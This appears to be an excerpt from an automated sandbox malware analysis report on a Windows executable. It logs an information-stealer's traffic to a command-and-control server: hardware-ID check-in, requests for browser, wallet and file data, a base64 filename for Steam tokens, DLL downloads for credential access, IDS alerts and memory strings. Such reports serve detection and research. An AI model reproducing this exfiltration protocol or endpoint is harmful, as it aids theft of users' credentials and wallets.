00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 21 Feb 2025 06:18:32 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 
00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.115 | Connection: Keep-Alive | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DGCAAAFCBFBAKFHJDBKJ | Host: 185.215.113.115 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache | Data Ascii: ------DGCAAAFCBFBAKFHJDBKJ | Content-Disposition: form-data; name="hwid" | 92D2B271288A3788952882 | ------DGCAAAFCBFBAKFHJDBKJ | Content-Disposition: form-data; name="build" | reno | ------DGCAAAFCBFBAKFHJDBKJ--
              Source: global traffic | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----IDGHDGIDAKEBAAKFCGHC | Host: 185.215.113.115 | Content-Length: 268 | Connection: Keep-Alive | Cache-Control: no-cache | Data Ascii: ------IDGHDGIDAKEBAAKFCGHC | Content-Disposition: form-data; name="token" | 572204b5789298322b4a4ce0fda33a0ac8fb001de3f450b26064848ee99bd1dfc8e4c5d6 | ------IDGHDGIDAKEBAAKFCGHC | Content-Disposition: form-data; name="message" | browsers | ------IDGHDGIDAKEBAAKFCGHC--
              Source: global traffic | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----HDGDHCGCBKFHJKEBKFBF | Host: 185.215.113.115 | Content-Length: 267 | Connection: Keep-Alive | Cache-Control: no-cache | Data Ascii: ------HDGDHCGCBKFHJKEBKFBF | Content-Disposition: form-data; name="token" | 572204b5789298322b4a4ce0fda33a0ac8fb001de3f450b26064848ee99bd1dfc8e4c5d6 | ------HDGDHCGCBKFHJKEBKFBF | Content-Disposition: form-data; name="message" | plugins | ------HDGDHCGCBKFHJKEBKFBF--
              Source: global traffic | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----EBGIEGCFHCFHIDHIJECA | Host: 185.215.113.115 | Content-Length: 268 | Connection: Keep-Alive | Cache-Control: no-cache | Data Ascii: ------EBGIEGCFHCFHIDHIJECA | Content-Disposition: form-data; name="token" | 572204b5789298322b4a4ce0fda33a0ac8fb001de3f450b26064848ee99bd1dfc8e4c5d6 | ------EBGIEGCFHCFHIDHIJECA | Content-Disposition: form-data; name="message" | fplugins | ------EBGIEGCFHCFHIDHIJECA--
              Source: global traffic | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJ | Host: 185.215.113.115 | Content-Length: 5831 | Connection: Keep-Alive | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1 | Host: 185.215.113.115 | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GIJECGDGCBKECAKFBGCA | Host: 185.215.113.115 | Content-Length: 995 | Connection: Keep-Alive | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AEHIECAFCGDBFHIDBKFC | Host: 185.215.113.115 | Content-Length: 1451 | Connection: Keep-Alive | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AKEBFCFIJJKKECAKJEHD | Host: 185.215.113.115 | Content-Length: 363 | Connection: Keep-Alive | Cache-Control: no-cache | Data Ascii: ------AKEBFCFIJJKKECAKJEHD | Content-Disposition: form-data; name="token" | 572204b5789298322b4a4ce0fda33a0ac8fb001de3f450b26064848ee99bd1dfc8e4c5d6 | ------AKEBFCFIJJKKECAKJEHD | Content-Disposition: form-data; name="file_name" | c21qbGxteW1sYnpxLnB3ZA== | ------AKEBFCFIJJKKECAKJEHD | Content-Disposition: form-data; name="file" | (empty) | ------AKEBFCFIJJKKECAKJEHD--
              Source: global traffic | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CFCBAAEBKEGHIEBFIJJK | Host: 185.215.113.115 | Content-Length: 363 | Connection: Keep-Alive | Cache-Control: no-cache | Data Ascii: ------CFCBAAEBKEGHIEBFIJJK | Content-Disposition: form-data; name="token" | 572204b5789298322b4a4ce0fda33a0ac8fb001de3f450b26064848ee99bd1dfc8e4c5d6 | ------CFCBAAEBKEGHIEBFIJJK | Content-Disposition: form-data; name="file_name" | c21qbGxteW1sYnpxLnB3ZA== | ------CFCBAAEBKEGHIEBFIJJK | Content-Disposition: form-data; name="file" | (empty) | ------CFCBAAEBKEGHIEBFIJJK--
              Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1 | Host: 185.215.113.115 | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1 | Host: 185.215.113.115 | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1 | Host: 185.215.113.115 | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1 | Host: 185.215.113.115 | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1 | Host: 185.215.113.115 | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1 | Host: 185.215.113.115 | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----JDHIEBFHCAKEHIDGHCBA | Host: 185.215.113.115 | Content-Length: 1067 | Connection: Keep-Alive | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DBFHDBGIEBFIIDGCBFBK | Host: 185.215.113.115 | Content-Length: 267 | Connection: Keep-Alive | Cache-Control: no-cache | Data Ascii: ------DBFHDBGIEBFIIDGCBFBK | Content-Disposition: form-data; name="token" | 572204b5789298322b4a4ce0fda33a0ac8fb001de3f450b26064848ee99bd1dfc8e4c5d6 | ------DBFHDBGIEBFIIDGCBFBK | Content-Disposition: form-data; name="message" | wallets | ------DBFHDBGIEBFIIDGCBFBK--
              Source: global traffic | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHD | Host: 185.215.113.115 | Content-Length: 265 | Connection: Keep-Alive | Cache-Control: no-cache | Data Ascii: ------FCBFBGDBKJKECAAKKFHD | Content-Disposition: form-data; name="token" | 572204b5789298322b4a4ce0fda33a0ac8fb001de3f450b26064848ee99bd1dfc8e4c5d6 | ------FCBFBGDBKJKECAAKKFHD | Content-Disposition: form-data; name="message" | files | ------FCBFBGDBKJKECAAKKFHD--
              Source: global traffic | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DHCBAEHJJJKKFIDGHJEC | Host: 185.215.113.115 | Content-Length: 363 | Connection: Keep-Alive | Cache-Control: no-cache | Data Ascii: ------DHCBAEHJJJKKFIDGHJEC | Content-Disposition: form-data; name="token" | 572204b5789298322b4a4ce0fda33a0ac8fb001de3f450b26064848ee99bd1dfc8e4c5d6 | ------DHCBAEHJJJKKFIDGHJEC | Content-Disposition: form-data; name="file_name" | c3RlYW1fdG9rZW5zLnR4dA== | ------DHCBAEHJJJKKFIDGHJEC | Content-Disposition: form-data; name="file" | (empty) | ------DHCBAEHJJJKKFIDGHJEC--
              Source: global traffic | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----FIDAFCAFCBKECBGCFIIJ | Host: 185.215.113.115 | Content-Length: 272 | Connection: Keep-Alive | Cache-Control: no-cache | Data Ascii: ------FIDAFCAFCBKECBGCFIIJ | Content-Disposition: form-data; name="token" | 572204b5789298322b4a4ce0fda33a0ac8fb001de3f450b26064848ee99bd1dfc8e4c5d6 | ------FIDAFCAFCBKECBGCFIIJ | Content-Disposition: form-data; name="message" | ybncbhylepme | ------FIDAFCAFCBKECBGCFIIJ--
              Source: global traffic | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----IIEHJKJJJECFHJJJKKEC | Host: 185.215.113.115 | Content-Length: 272 | Connection: Keep-Alive | Cache-Control: no-cache | Data Ascii: ------IIEHJKJJJECFHJJJKKEC | Content-Disposition: form-data; name="token" | 572204b5789298322b4a4ce0fda33a0ac8fb001de3f450b26064848ee99bd1dfc8e4c5d6 | ------IIEHJKJJJECFHJJJKKEC | Content-Disposition: form-data; name="message" | wkkjqaiaxkhb | ------IIEHJKJJJECFHJJJKKEC--
              Source: Joe Sandbox View | IP Address: 239.255.255.250
              Source: Joe Sandbox View | IP Address: 185.215.113.115
              Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
              Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49731 -> 185.215.113.115:80
              Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49753 -> 185.215.113.115:80
              Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.115
              Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.32
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Code function: 0_2_6C59CC60 PR_Recv | 0_2_6C59CC60
              Source: global traffic | HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 | Host: www.google.com | Connection: keep-alive | X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX | Sec-Fetch-Site: none | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
              Source: global traffic | HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1 | Host: www.google.com | Connection: keep-alive | Sec-Fetch-Site: none | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
              Source: global traffic | HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 | Host: www.google.com | Connection: keep-alive | X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
              Source: global traffic | HTTP traffic detected: GET /async/newtab_promos HTTP/1.1 | Host: www.google.com | Connection: keep-alive | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
              Source: global traffic | HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1 | Host: apis.google.com | Connection: keep-alive | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | sec-ch-ua-platform: "Windows" | Accept: */* | X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: script | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.115 | Connection: Keep-Alive | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1 | Host: 185.215.113.115 | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1 | Host: 185.215.113.115 | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1 | Host: 185.215.113.115 | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1 | Host: 185.215.113.115 | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1 | Host: 185.215.113.115 | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1 | Host: 185.215.113.115 | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1 | Host: 185.215.113.115 | Cache-Control: no-cache
              Source: global traffic | DNS traffic detected: DNS query: www.google.com
              Source: global traffic | DNS traffic detected: DNS query: apis.google.com
              Source: global traffic | DNS traffic detected: DNS query: play.google.com
              Source: unknown | HTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1 | Host: play.google.com | Connection: keep-alive | Content-Length: 917 | sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" | sec-ch-ua-platform: "Windows" | sec-ch-ua-mobile: ?0 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 | Content-Type: application/x-www-form-urlencoded;charset=UTF-8 | Accept: */* | Origin: chrome-untrusted://new-tab-page | X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: cors | Sec-Fetch-Dest: empty | Accept-Encoding: gzip, deflate, br | Accept-Language: en-US,en;q=0.9
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000677000.00000040.00000001.01000000.00000003.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.000000000102E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001088000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001088000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/freebl3.dll
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001088000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/mozglue.dll
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.00000000010E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/msvcp140.dll
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001088000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/msvcp140.dlla
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001088000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/nss3.dll
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001088000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/softokn3.dll
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001088000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/softokn3.dllp
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001088000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/sqlite3.dll
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001088000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/sqlite3.dlle
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001088000.00000004.00000020.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.00000000010E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.00000000010E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll$
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.00000000010E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll4
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.00000000010E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/68b591d6548ec281/vcruntime140.dlld
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001088000.00000004.00000020.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.00000000010E0000.00000004.00000020.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.00000000010A3000.00000004.00000020.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.000000000102E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.00000000010A3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php3#z7
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001088000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/c4becf79229cb002.php8
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.00000000010E0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpB
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.0000000001088000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpD
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.00000000010A3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpl:z0
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000677000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phprofiles
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.000000000102E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phprowser
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000677000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpser
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.000000000102E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115/c4becf79229cb002.phpxA
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000677000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://185.215.113.115c4becf79229cb002.phpser
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.000000000102E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.115y
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
